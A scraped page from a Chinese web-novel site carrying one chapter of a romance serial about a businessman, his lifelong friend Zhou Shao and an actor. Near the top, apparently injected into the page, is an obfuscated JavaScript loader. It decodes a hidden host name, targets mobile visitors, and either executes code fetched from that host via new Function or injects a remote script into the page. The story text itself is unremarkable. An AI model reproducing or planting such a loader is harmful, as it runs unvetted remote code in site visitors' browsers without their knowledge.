躺着看小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2RqYnZza2p2ZHMuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一页
目录 | 设置
下一章

分卷阅读13(2 / 2)

加入书签 | 推荐本书 | 问题反馈 |

“爬我的床?当时我有什麽好处给他?好吧,就算他是主动的,当时和他接触的,愿意捧他的人不少,哪个不比我能捧他?若他跟了别人,他还能处在现在这种不尴不尬的地位?”

“他就看准了你心软的这点。”

“不管怎麽样,提出条件的人是我。那时真的挺堕落的……没有比那时更难熬的日子了。人啊,越到难处越是逞强,总希望有一个人比自己更弱小,才能显示自己强者的身份。”聂承语自嘲的说道,那时他遇见容离,正是父母去世不久,公司股东纷纷给他下马威的时候。

“可是,当时站在你身边的,不止他一个人。”周少淡淡的说道,他没有再说话,内心里,一股烟草般苦涩的味道渐渐弥漫开来。

“你不一样啊……”聂承语慢慢的把头靠在周少的肩膀:“我怎麽能把你和他归为一类。我们在一起过了二十多年了,仅仅是朋友两个字不能说清我们之间的关系,我在世上已经没有亲人了,若说还有重要的人,那也只有你了。”

“如果,我说如果,当初和你喝醉酒的是我,发生……发生关系的是我,你会怎麽做?”

聂承语揉了揉他的头发,笑了:“我不会让这种事发生。”

周少有些烦躁:“我说如果。”

“没有如果。”

一句没有如果,让两人的关系骤然微妙起来。聂承语为公司的事忙得焦头烂额,其余的时间偶尔约约容离,在聂承语的斡旋下,容离顺利得到了男二的角色。而周少,却将所有的业余时间投入到新来的助理身上,仿佛以此能疏导心中的苦闷和纷乱。

小七依然傻乎乎的,努力的跟著周少学习,努力的工作,偶尔祥瑞一下周少。

秘书小姐漂亮温柔,小七人小,被安排在秘书小姐的旁边,安安静静,乖乖的,秘书小姐喜欢得不得了。

“来来,小七,给你吃的。”

“咦,是什麽?”

秘书小姐从抽屉里拿出一袋进口的棉花糖:“这个可好吃了。”

小七翻过包装袋:“看起来很贵的样子,也没有在广告上看到过呢。”

秘书小姐捂嘴笑:“广告才不会做这个,这个可贵了,周少最爱吃这个。”

小七瞪大眼,实在想不出来看起来魁梧高大的周少会喜欢吃这个。

“嘘,不能给别人说哦,周少不喜欢别人知道。”

“我一定不给别人说!”

小七是没说,可是第二天,全部看不能使用特殊html的人都知道了。

照片上,周少倚在兰博基尼旁,面无表情的撕扯著一根长条形的棉花糖,似在等人,很显然,那人一直没来,周少把棉花糖当那人在啃。

照片的标题很耸动,千亿公子被放鸽子,棉花糖泄愤。

周少很暴躁,聂承语似乎有意和他拉开关系。自那日在周宅过後,周少见容离进了剧组,聂承语公司和家里两头跑不容易,特意在原本聂承语所住的别墅区为他安排一套住房,聂承语开始拒绝,後来在周少的强硬下住了进去。

那是周少和聂承语最後的一次联系,後来几次邀约,聂承语都以工作推脱。国外形势不好,战争一触即发,聂承语手下几个bot项目面临巨额亏损。

周少想援手,但是聂承语不表态,他也不可能主动出手,昨日他和聂承语约好一起吃午饭,没想到聂承语却放了他鸽子。

後来他得到了消息,聂承语去探望了容离。

“不好意思,我不知道要走这麽远。”周少带著小七去巡视了某家刚开张的大型商场,商场离特色古街并不远,浅浅嘱咐了周少给她带青团,於是周少拒绝了商场经理的接送,让於磊直接去古街接他。

小七自告奋勇走小路,结果走了一段,周少的脸越来越黑。

小七口里“不远”和周少想象中的不远,差得实在太远。

两人好不容易到了特色古街,结果周少一摸口袋,钱包和手机全扔车上了。

分卷阅读13

- 高辣文(www.gaolabook.com)

上一页
目录
下一章
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间